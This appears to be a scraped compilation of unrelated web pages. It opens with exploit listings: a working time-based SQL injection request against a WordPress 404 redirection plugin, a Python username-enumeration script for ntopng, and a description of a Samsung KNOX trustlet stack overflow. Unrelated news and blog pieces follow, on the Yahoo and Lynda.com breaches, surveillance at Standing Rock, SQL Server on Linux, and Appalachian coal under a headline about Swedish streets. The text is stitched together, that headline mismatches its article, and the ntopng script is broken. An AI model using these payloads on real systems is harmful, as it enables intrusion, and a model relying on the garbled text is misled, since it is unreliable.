WordPress 404 1.0 SQL Injection

# Exploit Title: Unauthenticated SQL injeciton in 404 plugin for WordPress v1.0
# Google Dork: N/A
# Date: 17/12/2016
# Exploit Author: Ahmed Sherif (Deloitte)
# Vendor Homepage: N/A
# Software Link: https://wordpress.org/plugins/404-redirection-manager/
# Version: V1.0
# Tested on: Linux Mint
# CVE : N/A

The plugin does not properly sanitize the user input. Hence, it was
vulnerable to SQL injection.

The vulnerable page is : custom/lib/cf.SR_redirect_manager.class.php on line 356

[#] Proof of Concept (PoC):

GET /path-to-wordpress/%27%29%20AND%20%28SELECT%20%2a%20FROM%20%28SELECT%28SLEEP%285-%28IF%28%27a%27%3D%27a%27%2C0%2C5%29%29%29%29%29FPYG%29%20AND%20%28%27SQL%27%3D%27SQL
Host: localhost

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wp-settings-time-1=1480877693
Connection: close*

ntop-ng 2.5.160805 Username Enumeration

# Exploit title: ntopng user enumeration
# Author: Dolev Farhi
# Contact: dolevf at protonmail.com
# Date: 04-08-2016
# Vendor homepage: ntop.org
# Software version: v.2.5.160805

import os
import sys
import urllib
import urllib2
import cookielib

server = ‘ip.add.re.ss’
username = ‘ntopng-user’
password = ‘ntopng-password’
timeout = 6

if len(sys.argv) < 2:
print(“usage: %s “) % sys.argv[0]

if not os.path.isfile(sys.argv[1]):
print(“%s doesn’t exist”) % sys.argv[1]

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
login_data = urllib.urlencode({‘user’ : username, ‘password’ :
password, ‘referer’ : ‘/authorize.html’})
opener.open(‘http://’ + server + ‘:3000/authorize.html’, login_data,
print(“\nEnumerating ntopng…\n”)
with open(sys.argv[1]) as f:
for user in f:
user = user.strip()
url = ‘http://%s:3000/lua/admin/validate_new_user.lua?user=%s&netw
orks=,::/0′ % (server, user)
resp = opener.open(url)
if “existing” not in resp.read():
print “[NOT FOUND] %s” % user
print “[FOUND] %s” % user
except Exception as e:
print e

Samsung Devices KNOX Extensions OTP TrustZone Trustlet Stack Buffer Overflow

As a part of the KNOX extensions available on Samsung devices, Samsung provides a TrustZone trustlet which allows the generation of OTP tokens. The tokens themselves are generated in a TrustZone application within the TEE (UID: fffffffff0000000000000000000001e), which can be communicated with using the "OTP" service, published by "otp_server". Many of the internal commands supported by the trustlet must either unwrap or wrap a token. They do so by calling the functions "otp_unwrap" and "otp_wrap", correspondingly. Both functions copy the internal token data to a local stack based buffer before attempting to wrap or unwrap it. However, this copy operation is performed using a length field supplied in the user's buffer (the length field's offset changes according to the calling code-path), which is not validated at all. This means an attacker can supply a length field larger than the stack based buffer, causing the user-controlled token data to overflow the stack buffer. There is no stack cookie mitigation in MobiCore trustlets. On the device I'm working on (SM-G925V), the "OTP" service can be accessed from any user, including from the SELinux context "untrusted_app". Successfully exploiting this vulnerability should allow a user to elevate privileges to the TrustZone TEE.


Yahoo security problems a story of too little, too late | Reuters

Yahoo security problems a story of too little, too late | Reuters

Yahoo security problems a story of too little, too late

Sun Dec 18, 2016 | 5:39 PM EST

By Joseph Menn, Jim Finkle and Dustin Volz | SAN FRANCISCO/BOSTON/WASHINGTON

In the summer of 2013, Yahoo Inc launched a project to better secure the passwords of its customers, abandoning the use of a discredited technology for encrypting data known as MD5.

It was too late. In August of that year, hackers got hold of more than a billion Yahoo accounts, stealing the poorly encrypted passwords and other information in the biggest data breach on record. Yahoo only recently uncovered the hack and disclosed it last week.

The timing of the attack might seem like bad luck, but the weakness of MD5 had been known by hackers and security experts for more than a decade. MD5 can be cracked more easily than other so-called “hashing” algorithms, which are mathematical functions that convert data into seemingly random character strings.

In 2008, five years before Yahoo took action, Carnegie Mellon University’s Software Engineering Institute issued a public warning to security professionals through a U.S. government-funded vulnerability alert system: MD5 “should be considered cryptographically broken and unsuitable for further use.”

Yahoo’s failure to move away from MD5 in a timely fashion was an example of problems in Yahoo’s security operations as it grappled with business challenges, according to five former employees and some outside security experts. Stronger hashing technology would have made it more difficult for the hackers to get into customer accounts after breaching Yahoo’s network, making the attack far less damaging, they said.

“MD5 was considered dead long before 2013,” said David Kennedy, chief executive of cyber firm TrustedSec LLC. “Most companies were using more secure hashing algorithms by then.” He did not name specific firms.

Yahoo, which has confirmed it was still using MD5 at the time of the attack, disputed the notion that the company had skimped on security.

“Over the course of our more than 20-year history, Yahoo has focused on and invested in security programs and talent to protect our users,” Yahoo said in a statement to Reuters. “We have invested more than $250 million in security initiatives across the company since 2012.”


The former Yahoo security staffers, however, told Reuters the security team was at times turned down when it requested new tools and features such as strengthened cryptography protections, on the grounds that the requests would cost too much money, were too complicated, or were simply too low a priority.

Partly, that reflected the internet pioneer’s long-running financial struggles: Yahoo’s revenues and profits have fallen steadily since their 2008 peak while Alphabet Inc’s Google, Facebook Inc and others have come to dominate the consumer internet business.

“When business is good, it’s easy to do things like security,” said Jeremiah Grossman, who worked on Yahoo’s security team from 1999 to 2001. “When business is bad, you expect to see security get cut.”

To be sure, no system is completely hack-proof. Hackers have managed to break into passwords that were encrypted using more advanced technologies than MD5. Other Internet companies, such as LinkedIn and AOL, have also suffered security breaches, though none nearly as large as Yahoo’s.

“This could happen to any large corporation,” said Tom Kellermann, a former World Bank security manager and security industry executive.

Kellermann, now CEO of investment firm Strategic Cyber Ventures, said he was not surprised that it had taken Yahoo several years to identify the massive attacks. “Hackers often have a capacity to burrow deeper than we thought into a system and remain for years,” he said.

Reuters could not determine how many companies besides Yahoo were using MD5 in 2013. Google, Facebook and Microsoft Corp did not immediately respond to requests for comment.

According to another former security veteran at Yahoo, even when the company was growing quickly, security sometimes took a back seat as the company focused on system performance to keep up with the growth.

Then, when growth stalled, senior security staff left for other companies and the chances of getting approval for expensive upgrades dropped further, the person said.

“Any changes to the user database took forever because they were understaffed, and it’s an ultra-critical system – everything depends on it,” said the former Yahoo employee.

Yahoo declined to comment on details of its security practices, but said it routinely conducted drills to test and improve its cyber defenses and highlighted campaigns such as a “bug bounty” program in which it pays hackers to find security flaws and report them to the company.


Last September, Yahoo disclosed a 2014 cyber attack that affected at least 500 million customer accounts, the biggest known data breach at the time.

Following last week’s news of the even bigger 2013 breach, U.S. federal investigators and lawmakers said they are scrutinizing Yahoo’s security practices, and Verizon Communications Inc is seeking to renegotiate a July deal to buy Yahoo’s internet business for $4.8 billion.

The former Yahoo employees said the company’s security problems began before the arrival of Chief Executive Marissa Mayer in 2012 and continued under her tenure. Yahoo had suffered attacks by Russian hackers for years, two of the former staffers said.

In 2014, Yahoo hired a new security chief, Alex Stamos, and one of the security crews he led – known internally as ‘The Paranoids’ – thought they were making headway against the hackers, former employees said. In 2015, when the security crew discovered a hidden program attached to Yahoo’s email servers that was monitoring all incoming messages, their first thought was that the Russian hackers had come back.

It turned out that the program had been installed by Yahoo’s email engineers to comply with a secret surveillance order requested by a U.S. intelligence agency, as Reuters previously reported. Stamos and some of his staff left Yahoo soon after that, creating further disruptions to security operations.

This week, in addition to disclosing the 2013 hack, Yahoo said someone had accessed its proprietary computer code to learn how to forge “cookies,” which would allow hackers to access an account without passwords. Yahoo said it connected some cookie-forging activity to the same state-sponsored actor it believed was responsible for the 2014 data theft.

“They burrowed in and got access to everything,” said Dan Guido, chief executive of cyber security firm Trail of Bits.

On Thursday, Germany’s cyber security authority criticized Yahoo for failing to adopt adequate encryption techniques and advised German consumers to switch to other email providers.

Yahoo told Reuters it was committed to keeping users secure by staying ahead of new threats. “Today’s security landscape is complex and ever-evolving, but, at Yahoo, we have a deep understanding of the threats facing our users and continuously strive to stay ahead of these threats to keep our users and our platforms secure.”

(Reporting by Joseph Menn in San Francisco, Jim Finkle in Boston and Dustin Volz in Washington; Editing by Jonathan Weber and Bill Rigby)

Investigating Law Enforcement’s Possible Use of Surveillance Technology at Standing Rock | Electronic Frontier Foundation

Investigating Law Enforcement’s Possible Use of Surveillance Technology at Standing Rock | Electronic Frontier Foundation

Investigating Law Enforcement’s Possible Use of Surveillance Technology at Standing Rock

One of the biggest protests of 2016 is still underway at the Standing Rock Sioux Reservation in North Dakota, where Water Protectors and their allies are fighting Energy Transfer Partners’ plans to drill beneath contested Treaty land to finish the Dakota Access Pipeline. While the world has been watching law enforcement’s growing use of force to disrupt the protests, EFF has been tracking the effects of its surveillance technologies on water protectors’ communications and movement.

Following several reports of potentially unlawful surveillance, EFF sent technologists and lawyers to North Dakota to investigate. We collected anecdotal evidence from water protectors about suspicious cell phone behavior, including uncharacteristically fast battery drainage, applications freezing, and phones crashing completely. Some water protectors also saw suspicious login attempts to their Google accounts from IP addresses originating from North Dakota’s Information & Technology Department. On social media, many reported Facebook posts and messenger threads disappearing, as well as Facebook Live uploads failing to upload or, once uploaded, disappearing completely.

While some have attributed these issues to secret surveillance technologies like cell-site simulators (“CSSs,” also known colloquially as Stingrays) and malware, it’s been very difficult to pinpoint the true cause or causes.

To try to figure this out, EFF also sent more than 20 public records requests to federal, state and local law enforcement agencies that have been sighted at Standing Rock or are suspected of providing surveillance equipment to agencies on the ground. So far, only one federal agency – the US Marshals’ Service – has denied use of cell-site simulators, while the remaining federal agencies have yet to respond or have claimed their responsive documents are so numerous as to make production untenable and costly. Of the fifteen local and state agencies that have responded, thirteen deny having any record at all of cell site simulator use, and two agencies—Morton County and the North Dakota State Highway Patrol (the two agencies most visible on the ground)—claim that they can’t release records in the interest of “public safety,”—even though they fail to specify what public safety interest they seek to protect or how long they expect such an interest to outweigh the public’s right to know what they are doing at Standing Rock. Hennepin County, Minnesota—noted to both have access to CSSs and to have withdrawn officers and equipment from Standing Rock—has dodged our public records request by passing the buck to the Minnesota Department of Homeland Security and Emergency Management, which has yet to respond to our inquiry.

Law enforcement agencies should not be allowed to sidestep public inquiry into the surveillance technologies they’re using, especially when citizens’ constitutional rights are at stake. This across-the-board lack of transparency is a real barrier to the kind of independent assessment and testing necessary to understand what technologies are being deployed on the ground, and by whom. For example, a benign variable like overloaded rural cell networks may be to blame for some of the connectivity problems water protectors have experienced. However, we can’t discount the possibility of interference caused by law enforcement’s use of surveillance technology against domestic activists without knowing what technologies are being used, where, when, how, why, and by whom. We need greater law enforcement transparency, deeper levels of investigation and public oversight, and continued independent testing on the ground.

We’re continuing to collect incident reports from water protectors on the ground, and we’re keeping an eye out for any signs of cell-site simulator use. If you’re at Standing Rock, here’s a list of potential signs to look out for:

1.      Apparent connectivity, but unable to transmit/receive or unusual delay in calls/texts (bars, but service not normal)

2.     Unexpected loss of mobile signal (no bars)

3.     Sudden mobile phone battery draining

4.     Unexpected downgrading in cellular network (4G to 3G, 3G to 2G, etc.)

5.     IMSI catcher evidence as detected by software (e.g. AIMSICD, Snoopsnitch)

If you directly witness digital communication interference while at Standing Rock that you’d like to report, please let us know here.

It is past time for the Department of Justice to investigate the scope of law enforcement’s digital surveillance at Standing Rock and its consequences for civil liberties and freedoms in the digital world. The government has a choice: if it will not be transparent enough to allow the public to police it, then it must police itself. However, if the agencies charged with serving and protecting Americans are in fact persecuting and threatening our civil rights, then they must be held accountable and stopped from violating the very rights they were created to defend.

LinkedIn’s training arm resets 55,000 members’ passwords

LinkedIn’s training arm resets 55,000 members’ passwords • The Register

LinkedIn’s training arm resets 55,000 members’ passwords

Lynda.com database accessed by ‘unauthorized third party’

Lynda.com, the training arm of LinkedIn, on Saturday issued email notices to about 55,000 members whose data it says has been persued by “unauthorized third party.”

The letter sent to members, two of whom thoughtfully forwarded it to El Reg, reads as follows:

We recently became aware that an unauthorized third party breached a database that included some of your Lynda​.com learning data, such as contact information and courses viewed. We are informing you of this issue out of an abundance of caution.

Please know that we have no evidence that this data included your password. And while we have no evidence that your specific account was accessed or that any data has been made publicly available, ​we wanted to notify you as a precautionary measure.

The Register asked LinkedIn when the breach detected, when it occurred and how many people were impacted.

The company offered a statement penned by an un-named spokesperson, re-stating news of the breach and offering the following.

As a precautionary measure, we reset passwords for the less than 55,000 Lynda.com users affected and are notifying them of the issue. We’re also working to notify approximately 9.5 million Lynda.com users who had learner data, but no protected password information, in the database. We have no evidence that any of this data has been made publicly available and we have taken additional steps to secure Lynda.com accounts.

LinkedIn has form when it comes to breaches: earlier this year the company downplayed the sale of 117m user records. Which is a trivial number compared to the billion users records Yahoo! last week admitted it had lost, probably as a result of management fearing a costly and complex encryption re-tooling effort. ®


SQL Server on Linux: How? Introduction

SQL Server on Linux: How? Introduction | SQL Server Blog

SQL Server on Linux: How? Introduction

This post was authored by Scott Konersmann, Partner Engineering Manager, SQL Server, Slava Oks, Partner Group Engineering Manager, SQL Server, and Tobias Ternstrom, Principal Program Manager, SQL Server


We first announced SQL Server on Linux in March, and recently released the first public preview of SQL Server on Linux (SQL Server v.Next CTP1) at the Microsoft Connect(); conference. We’ve been pleased to see the positive reaction from our customers and the community; in the two weeks following the release, there were more than 21,000 downloads of the preview. A lot of you are curious to hear more about how we made SQL Server run on Linux (and some of you have already figured out and posted interesting articles about part of the story with “Drawbridge”). We decided to kick off a blog series to share technical details about this very topic starting with an introduction to the journey of offering SQL Server on Linux. Hopefully you will find it as interesting as we do! J


Making SQL Server run on Linux involves introducing what is known as a Platform Abstraction Layer (“PAL”) into SQL Server. This layer is used to align all operating system or platform specific code in one place and allow the rest of the codebase to stay operating system agnostic. Because of SQL Server’s long history on a single operating system, Windows, it never needed a PAL. In fact, the SQL Server database engine codebase has many references to libraries that are popular on Windows to provide various functionality. In bringing SQL Server to Linux, we set strict requirements for ourselves to bring the full functional, performance, and scale value of the SQL Server RDBMS to Linux. This includes the ability for an application that works great on SQL Server on Windows to work equally great against SQL Server on Linux. Given these requirements and the fact that the existing SQL Server OS dependencies would make it very hard to provide a highly capable version of SQL Server outside of Windows in reasonable time it was decided to marry parts of the Microsoft Research (MSR) project Drawbridge with SQL Server’s existing platform layer SQL Server Operating System (SOS) to create what we call the SQLPAL. The Drawbridge project provided an abstraction between the underlying operating system and the application for the purposes of secure containers and SOS provided robust memory management, thread scheduling, and IO services. Creating SQLPAL enabled the existing Windows dependencies to be used on Linux with the help of parts of the Drawbridge design focused on OS abstraction while leaving the key OS services to SOS. We are also changing the SQL Server database engine code to by-pass the Windows libraries and call directly into SQLPAL for resource intensive functionality.

Requirements for supporting Linux

SQL Server is Microsoft’s flagship database product which with close to 30 years of development behind it. At a high level, the list below represents our requirements as we designed the solution to make the SQL Server RDBMS available on multiple platforms:

  1. Quality and security must meet the same high bar we set for SQL Server on Windows
  2. Provide the same value, both in terms of functionality, performance, and scale
  3. Application compatibility between SQL Server on Windows and Linux
  4. Enable a continued fast pace of innovation in the SQL Server code base and make sure new features and fixes appear immediately across platforms
  5. Put in place a foundation for future SQL Server suite services (such as Integration Services) to come to Linux

To make SQL Server support multiple platforms, the engineering task is essentially to remove or abstract away its dependencies on Windows. As you can imagine, after decades of development against a single operating system, there are plenty of OS-specific dependencies across the code base. In addition, the code base is huge. There are tens of millions of lines of code in SQL Server.

SQL Server depends on various libraries and their functions and semantics commonly used in Windows development that fall into three categories:

  • “Win32” (ex. user32.dll)
  • NT Kernel (ntdll.dll)
  • Windows application libraries (such as MSXML)

You can think of these as core library functions, most of them have nothing to do with the operating system kernel and only execute in user mode.

While SQL Server has dependencies on both Win32 and the Windows kernel, the most complex dependency is that of Windows application libraries that have been added over the years in order to provide new functionality.  Here are some examples:

  • SQL Server’s XML support uses MSXML which is used to parse and process XML documents within SQL Server.
  • SQLCLR hosts the Common Language Runtime (CLR) for both system types as well as user defined types and CLR stored procedures.
  • SQL Server has some components written in COM like the VDI interface for backups.
  • Heterogeneous distributed transactions are controlled through Microsoft Distributed Transaction Coordinator (MS DTC)
  • SQL Server Agent integrates with many Windows subsystems (shell execution, Windows Event Log, SMTP Mail, etc.).

These dependencies are the biggest challenge for us to overcome to meet our goals of bringing the same value and having a very high level compatibility between SQL Server on Windows and Linux. As an example, to re-implement something like SQLXML would take a significant amount of time and would run a high risk of not providing the same semantics as before, and could potentially break applications. The option of completely removing these dependencies would mean we must also remove the functionality they provide from SQL Server on Linux. If the dependencies were edge cases and only impacting very few customer visible features, we could have considered it. As it turns out, removing them would cause us to have to remove tons of features from SQL Server on Linux which would go against our goals around compatibility and value across operating systems.

We could take the approach of doing this re-implementation piecemeal, bringing value little by little. While this would be possible, it would also go against the requirements because it would mean that there would be a significant gap between SQL Server on Linux and Windows for years. The resolution lies in the right platform abstraction layer.

Building a PAL

Software that is supported across multiple operating systems always has an implementation of some sort of Platform Abstraction Layer (PAL). The PAL layer is responsible for abstraction of the calls and semantics of the underlying operating system and its libraries from the software itself. The next couple of sections consider some of the technology that we investigated as solutions to building a PAL for SQL Server.

SQL Operating System (SOS or SQLOS)

In the SQL Server 2005 release, a platform layer was created between the SQL Server engine and Windows called the SQL Operating System (SOS). This layer was responsible for user mode thread scheduling, memory management, and synchronization (see SQLOS for reference).  A key reason for the creation of SOS was that it allowed for a centralized set of low level management and diagnostics functionality to be provided to customers and support (subset of Dynamic Management Views/DMVs and Extended Events/XEvents).  This layer allowed us to minimize the number of system calls involved in scheduling execution by running non-preemptively and letting SQL Server do its own resource management.  While SOS improved performance and greatly helped supportability and debugging, it did not provide a proper abstraction layer from the OS dependencies described above, i.e. Windows semantics were carried through SOS and exposed to the database engine.


In the scenario where we would completely remove the dependencies on the underlying operating system from the database engine, the best option was to grow SOS into a proper Platform Abstraction Layer (PAL).  All the calls to Windows APIs would be routed through a new set of equivalent APIs in SOS and a new host extension layer would be added on the bottom of SOS that would interact with the operating system. While this would resolve the system call dependencies, it would not help with the dependencies on the higher-level libraries.


Drawbridge was an Microsoft Research project (see Drawbridge for reference) that focused on drastically reducing the virtualization resource overhead incurred when hosting many Virtual Machines on the same hardware.  The research involved two ideas.  The first idea was a “picoprocess” which consists of an empty address space, a monitor process that interacts with the host operating system on behalf of the picoprocess, and a kernel driver that allows a driver to populate the address space at startup and implements a host Application Binary Interface (ABI) that allows the picoprocess to interact with the host.  The second idea was a user mode Library OS, sometimes referred to as LibOS.  Drawbridge provided a working Windows Library OS that could be used to run Windows programs on a Windows host.  This Library OS implements a subset of the 1500+ Win32 and NT ABIs and stubs the rest to either succeed or fail depending on the type of call.


Our needs didn’t align with the original goals of the Drawbridge research.  For instance, the picoprocess idea isn’t something needed for moving SQL Server to other platforms.  However, there were a couple of synergies that stood out:

  1. Library OS implemented most of the 1500+ Windows ABIs in user mode and only 45-50 ABIs were needed to interact with the host.  These ABIs were for address space and memory management, host synchronization, and IO (network and disk).  This made for a very small surface area that needs to be implemented to interact with a host.  That is extremely attractive from a platform abstraction perspective.
  2. Library OS was capable of hosting other Windows components.  Enough of the Win32 and NT layers were implemented to host CLR, MSXML, and other APIs that the SQL suite depends on. This meant that we could get more functionality to work without rewriting whole features.

There were also some risk and reward tradeoffs:

  1. The Microsoft Research project was complete and there was no support for Drawbridge. Therefore, we needed to take a source snapshot and modify the code for our purposes.  The risks were around the costs to ramp up a team on the Library OS, modify it to be suitable for SQL Server, and make it perform comparably with Windows.  On the positive side, this would mean everything is in user mode and we would own all the code within the stack.  Performance critical code can be optimized because we can modify all layers of the stack including SQL Server, the Library OS, and the host interface as needed to make SQL Server perform.  Since there are no real boundaries in the process, it is possible for SQL Server to call Linux.
  2. The original Drawbridge project was built on Windows and used a kernel driver and monitor process.  This would need to be dropped in favor of a user mode only architecture.  In the new architecture, the host extension (referred to as PAL in the Drawbridge design) on Windows would move from a kernel driver to just a user mode program.  Interestingly enough, one of the researchers had developed a rough prototype for Linux that proved it could be done.
  3. Because the technologies were created independently there was a large amount of overlapping functionality.  SOS had subsystems for object management, memory management, threading/scheduling, synchronization, and IO (disk and network). The Library OS and Host Extension also had similar functionality.  These systems would need to be rationalized down to a single implementation.


Library OS

Host Extension

Object Management

Memory Management



I/O (Disk, Network)


As a result of the investigation, we decided on a hybrid strategy.  We would merge SOS and Library OS from Drawbridge to create the SQL PAL (SQL Platform Abstraction Layer). For areas of Library OS that SQL Server does not need, we would remove them. To merge these architectures, changes were needed in all layers of the stack.

The new architecture consists of a set of SOS direct APIs which don’t go through any Win32 or NT syscalls.  For code without SOS direct APIs they will either go through a hosted Windows API (like MSXML) or NTUM (NT User Mode API – this is the 1500+ Win32 and NT syscalls). All the subsystems like storage, network, or resource management will be based on SOS and will be shared between SOS direct and NTUM APIs.


This architecture provides some interesting characteristics:

  • Everything running in process boils down to the same platform assembly code.  The CPU can’t tell the difference between the code that is providing Win32 functionality to SQL Server or native Linux code.
  • Even though the architecture shows layering, there are no real boundaries within the process (There is no spoon!).  If code running in SQL Server which is performance critical needs to call Linux it can do that directly with a very small amount of assembler via the SOS direct APIs to setup the stack correctly and process the result.  An example where this has been done is the disk IO path.  There is a small amount of conversion code left to convert from Windows scatter/gather input structure to Linux vectored IO structure.  Other disk IO types don’t require any conversions or allocations.
  • All resources in the process can be managed by SQLPAL.  In SQL Server, before SQLPAL, most resources such as memory and threads were controlled, but there were some things outside it’s control.  Some libraries and Win32/NT APIs would create threads on their own and do memory allocations without using the SOS APIs.  With this new architecture, even the Win32 and NT APIs would be based on SQLPAL so every memory allocation and thread would be controlled by SQL PAL. As you can see this also benefits SQL Server on Windows.
  • For SQL Server on Linux we are using about 81 MB of uncompressed Windows libraries, so it’s a tiny fraction (less than 1%) of a typical Windows installation. SQLPAL itself is currently around 8 MB.

Process Model

The following diagram shows what the address space looks like when running.   The host extension is simply a native Linux application.  When host extension starts it loads and initializes SQLPAL, SQLPAL then brings up SQL Server.  SQLPAL can launch software isolated processes that are simply a collection of threads and allocations running within the same address space.  We use that for things like SQLDumper which is an application that is run when SQL Server encounters a problem to collect an enlightened crash dump.

One point to reiterate is that even though this might look like a lot of layers there aren’t any hard boundaries between SQL Server and the host.


Evolution of SQLPAL

At the start of the project, SQL Server was built on SOS and Library OS was independent.  The eventual goal is to have a merged SOS and Library OS as the core of SQL PAL.  For public preview, this merge wasn’t fully completed, but the heart of SQLPAL had been replaced with SOS.  For example, threads and memory already use SOS functionality instead of the original Drawbridge implementations.

The result is that there are two instances of SOS running inside the CTP1 release: one in SQL Server and one in SQLPAL .  This works fine because the SOS instance in SQL Server is still using Win32 APIs which call down into the SQLPAL.  The SQLPAL instance of the SOS code has been changed to call the host extension ABIs (i.e. the native Linux code) instead of Win32.

Now we are working on removing the SOS instance from SQL Server.  We are exposing the SOS APIs from the SQLPAL.  Once this is completed everything will flow through the single SQLPAL SOS instance.

More posts

We are planning more of these posts to share to tell you about our journey, which we believe has been amazing and a ton of fun worth sharing. Please provide comments if there are specific areas you are interested in us covering!


How Sweden Has Redesigned Streets To Route Around Bad Human Behavior

How Sweden Has Redesigned Streets To Route Around Bad Human Behavior | Co.Exist | ideas + impact

How Sweden Has Redesigned Streets To Route Around Bad Human Behavior

In the heart of Appalachia, in places like West Virginia and eastern Kentucky, life has long been built around coal, figuratively and literally. In the early 20th century, coal companies founded towns in the rugged and steep interiors of West Virginia to hold their workforces. But coal—and the traditional idea of coal country with it—is dying. Markets have embraced cheaper or cleaner alternatives. Natural gas has surpassed coal as the country’s largest source of net electricity generation. Renewables are projected to increase by 72% by 2040. After years of coal booms and busts, “this is final,” says Gwendolyn Christon, the owner of the IGA grocery store in Isom, Kentucky, and one of the many locals we spoke to in a trip across the region to document the future of coal country. “If we’re gonna stay here and prosper, we have to start looking for other ways of making a living. You have to do that quickly and not just sit back and wait for something to happen. It’s not going to depend on the federal government or someone coming in to rescue us. It’s going to be us going to work and doing it ourselves.” 

Throughout 2016, the decline of coal has been used as a political football, a metaphor for the damage done by liberal, environmentalist regulation to the working class. Hillary Clinton, who said that her energy plans would “put a lot of coal miners and coal companies out of business,” lost enormously across Appalachia. Donald Trump, both during the campaign and since his victory, has promised to save the coal industry with energy reform that rescinds environmental efforts like Obama’s Climate Action Plan; he’s also spoken of abolishing the Environmental Protection Agency, and there is concern he will ignore international climate agreements. In West Virginia, the newly elected Democratic governor, Trump-esque billionaire coal baron Jim Justice, is noncommittal on the existence of climate change and has pledged to “promote new uses for coal,” incentivize power plants to use only West Virginia coal and bring back coal jobs. But economics might be a stronger force than rhetoric: Even with the prospect of supportive federal and state administrations, many power company executivesincluding ones in Appalachia—are declaring that coal is simply too cost-ineffective, and are continuing with plans to shut down their coal-fired power plants.

But while coal country happens to be in the political spotlight today, the region is not unique in its susceptibility to the problems in which it finds itself. The 20th century has seen countless regional economies built on extractive and polluting industries that have been decimated by technological advancement and globalization: manufacturing in the Rust Belt, the auto industry in Detroit, the timber industry in the Pacific Northwest. As the coal industry dies—and make no mistake, it is dying—some in Appalachia are still clinging to a past that can’t save them, but many others are trying to find a way to create a new economy, focused on a future where the communities of Appalachia are more self-sustaining. In driving through the region this fall, we discovered that the lessons they’re learning and sharing will be vital as more and more industries—and the economies they support—fall victim to the same forces that are ending coal. The innovative web of entrepreneurs, community organizations, and government programs in Appalachia can serve as the model for the transition to a new economy for any community.

Coal keeps the lights on—until it doesn’t

In places like West Virginia, where my colleague Elaine McMillion Sheldon and I are from, coal is a foundational part of the cultural identity. So much so that on a rainy day this August, when we drove past a modest lot of used cars on West Virginia’s Route 19, the sign that loomed above it seemed completely normal: King Coal Pre-Owned Super Store. It might have held a certain significance now, as we crisscrossed West Virginia and eastern Kentucky, but we have driven by this sign and others like it dozens of times in our lives. To grow up in the heart of Appalachia is to internalize this narrative, whether your family has worked in the mines for generations (as in Elaine’s case) or it hasn’t (as in mine). Coal is king. Friends of coal. Coal keeps the lights on—until it doesn’t.

Listen to a short audio documentary introducing you to this trip to document the new economy of coal country:

The coal economy has been many things in and to Appalachia—pride, livelihood, environmental villain, political juggernaut—but it has never been particularly resilient. While U.S. coal production was on an overall increase from 1949 to the mid-2000s, that rise was peppered with spikes and plateaus, as well as fluctuations in the labor force. In the mid-20th century, mechanization and consolidation in the coal industry sent jobs plummeting. West Virginian mining jobs dropped from 125,000 to 65,000 between 1947 and 1954, eventually hitting 41,000 in 1968, which was at the time a 65-year low. (This era also marked a large regional migration to northern industrial cities, often referred to as the “Hillbilly Highway.” Between 1940 and 1960, 7 million Appalachians left.) Eastern Kentucky’s production experienced sharp downward spikes in the late 1950s and ’80s, West Virginia in the early ’90s and early 2000s. Coal has always brought booms as well as busts.

There is much evidence to suggest that Appalachia’s last boom has come and gone. Even without the rise of renewables, the bottom has fallen out of the coal market. The driving force in the decline of U.S. coal production is the booming shale gas market. Last year, for the first time, natural gas surpassed coal as the country’s largest source of net electricity generation. And coal from the western United States—where coal is generally cheaper and mined less labor-intensively in surface mines—is supplanting Appalachian coal. (The country’s biggest coal producer today is, by far, Wyoming.) Global exports, which account for an estimated 27% of West Virginia’s coal production, are also down.

Coal production here has been in overall decline since 1990, dropping by 45% between 2000 and 2015; in eastern Kentucky, production has plummeted by 80%. West Virginia, Appalachia’s biggest coal producer, produced 168 million short tons in 2008. If this year’s output continues at pace, that number is expected to hit 68 million, the state’s lowest annual output in a century. Long-term forecasts are similarly low: the West Virginia University Bureau of Business and Economic Research (BBER) projects state coal production to fall to fewer than 67 million short tons by 2036. (Back in 2009, Charleston Gazette-Mail writer Ken Ward Jr., long an important voice in this conversation, pointed out that the Appalachian Basin could hit “peak coal”—the point of maximum production, after which it’s all downhill—as early as 2020.) Between 2000-2015, Appalachia lost more than 9,300 coal jobs, and major mining companies like Alpha Natural Resources have filed for bankruptcy, leaving behind devastated livelihoods and devastated earth. WVU’s BBER sees only .5% job growth in the state’s natural resources and mining sector (with all of those jobs coming in natural gas) over the next five years; it expects coal industry employment to contract by an average annual rate of 2% per year through 2021.

A new economy, and a new identity

From the outside, coal’s dethroning to cheaper, cleaner alternatives may seem inarguable. But the reason for coal’s demise has been something of a debate, especially to those who believe that its only real problem is the Obama administration and a liberal, Environmental Protection Agency-led war on coal. (In fact, while compliance with the carbon-emissions-reducing Clean Power Plan contributes to decreased coal production, the U.S. EIA found that Appalachia would actually see the country’s smallest CPP-attributable drop.) So when Elaine and I set out to document the efforts underway in Appalachia’s transitioning economy, we knew that we could not presuppose that everyone believed such a transition was happening. The first question had to be not how is Appalachia transitioning, but is it?

On our travels through West Virginia and eastern Kentucky, we heard just one person refer in earnest to a war on coal. We heard many others—economists, community development leaders, small-business owners, ex-miners—say that the moment of transition had arrived. That there was no going back. That coal might still be mined, some miners might keep their jobs, but the industry would never again be what it once was. To say good-bye to coal—even if just to say good-bye to its halcyon days—is a profound spiritual and emotional decision for a people who have watched their family members work, suffer, and die underground, who have loved and taken deep pride in the community coal created. One person invoked the stages of grief, several others mentioned post-traumatic stress disorder. It’s hard to overstate—and perhaps, to outsiders, hard to explain at all—the mental shift that this economic change represents, and the reevaluation of identity it prompts.

It creates an opportunity, but it also creates a vacuum. For decades in West Virginia, for instance, the economy has been dominated by largely absentee companies that have, in essence, extracted twice: first resources, then profit. Relative to the wealth of coal moguls like Don Blankenship, the disgraced Massey Energy CEO (currently serving a one-year sentence for conspiring to violate federal mine safety standards in the Upper Big Branch disaster that killed 29 miners) and governor-elect Justice, little of coal’s prosperity has touched the people whose land it came from or who toiled to get it out, save for the new vehicles and homes bought with coal salaries and so easily repossessed after layoffs came to town. One possible outcome of an imbalance like this is the sense that one is living in a feudal state—that, when those lords leave, others need to come in to take their places. Much of the work being done by economic development groups around Appalachia starts with reversing this idea and helping people see the possibility, and opportunity, within themselves and their home.

Reinventing The Rural Economy

But this is less a story about coal’s decline than it is about what the people left in the wake of that descent can do after to quickly strengthen economic muscles that atrophied while coal grew more and more powerful. The decline of coal brings unprecedented opportunities to build lasting, meaningful economies. Here, in a place largely without the urban centers that traditionally attract the likes of Google and Uber, it is a chance to find new ways to utilize potential, to reinvent the rural economy into something multifaceted and resilient.

